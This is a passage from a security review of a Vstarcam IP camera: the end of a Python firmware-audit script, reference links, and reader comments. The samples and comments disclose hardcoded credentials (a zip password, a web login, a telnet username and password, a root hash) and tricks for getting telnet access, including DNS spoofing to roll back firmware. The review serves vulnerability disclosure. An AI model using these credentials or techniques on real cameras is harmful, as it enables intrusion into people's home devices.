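def audit_tree(root):
    """Audit every regular file under an extracted firmware tree."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            path = os.path.join(dirpath, filename)
            # Extracted images often contain symlinks that point outside
            # the tree; never follow them.
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            with open(path, "rb") as fh:
                findings += audit_blob(os.path.relpath(path, root), fh.read())
    return findings


# Constructed samples: strings from the article embedded in filler bytes.
SAMPLE_UPDATA = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8 +
    b"unzip www is start...\x00"
    b"/system/system/bin/unzip1 -o -P vstarcam!@#$%  /tmp/www.zip"
    b" -d /system  > /tmp/app.txt\x00"
    b"unzip www is end\x00\x01\x02rm /tmp/www.zip\x00")
SAMPLE_LOGIN_CGI = (b'var loginuser="admin";\n'
                    b'var loginpass="erocgfhruehgi3ureozkfx";\n'
                    b'var pri=255;\n')

if __name__ == "__main__":
    for finding in (audit_blob("updata", SAMPLE_UPDATA)
                    + audit_blob("login.cgi", SAMPLE_LOGIN_CGI)):
        print(finding["file"], finding["rule"], sep=": ")
```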

6. Links

http://catdevzero.blogspot.sg/2015/02/experiments-with-ip-camera-part-1.html
http://liken.otsoa.net/blog/?x=entry:entry140322-183809
http://jumpespjump.blogspot.co.uk/2015/09/how-i-hacked-my-ip-camera-and-found.html
https://www.pentestpartners.com/blog/hacking-the-ip-camera-part-1/

17 thoughts on “C7824WIP Security Review”

  1. Very nice, on my camera the password is an empty string.

    There is an interesting line.
    It would appear that the password is generated randomly by a program or function called CreateTelnetPasswd.

    How would you recommend getting telnet access?

    ===websLaunchCgiProc===
    /etc/passwd
    vstarcam2015:%s:0:0:Administrator:/:/bin/sh
    /etc/group
    root:x:0:admin
    CreateTelnetPasswd
    WebReadParam
    /
    …skipping
    root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh

    1. Never mind my last post, the FTP thing worked. The password might take a while to crack tho.
      I wish these cameras were Open-Source, they could probably sell more units if they did that.

      1. BTW, for anyone else reading this the password was 20150602 for firmware 48.53.72.74. The username was vstarcam2015

        Thanks for the great article on reverse engineering.

  2. Hi guys,

    Great article, I learned a lot from it.

    I have this cam and I want to use it in a secure way. When I disable traffic to internet for this device on my router and reboot the cam, I can’t connect anymore via the Android application (eye4). Even telnet and nmap don’t show life.

    I tried to find another application that could connect internally but none of them succeeds to show any frame.

    Someone knows about some good app?

    10x
    Daniel

    1. Daniel,

      I would not be surprised that the Eye4 app is not working anymore after that.
      However it is unlikely that telnet and HTTP no longer work. Did you try to ping the cam ?

      If NMAP is not showing up anything, any client will be able to connect.

    1. Hi,

      Unfortunately I don’t have the camera anymore but if I remember correctly, this should be mentioned somewhere on the Web UI (maintenance, system or something similar).

      Ronan

  3. Very interesting article, I was going to buy this camera as baby monitor.
    Just a couple of questions: would be a little less insecure changing the root password to something a bit harder to brute-force than 123456?
    Furthermore what if I don’t forward the telnet and ftp port?
    Thanks!

    1. Not really, it’s reset when the camera boots up, and for me the biggest issue is to have a videostream going on unknown servers…

      But having this camera running on a local network without internet connection should be ok…

  4. It seems they have addressed the security vulnerabilities. Today I updated the firmware and NMAP didn’t show any open ports…

    1. Hi,

      Good to know ! Maybe they didn’t fix the injection breach, and there is still a way to activate Telnet by this way.

      Ronan

  5. You can easily spoof the DNS for the update request, whereby pointing it to an IP holding older firmware. I have successfully got telnet working, however the web interface has been removed it seems.
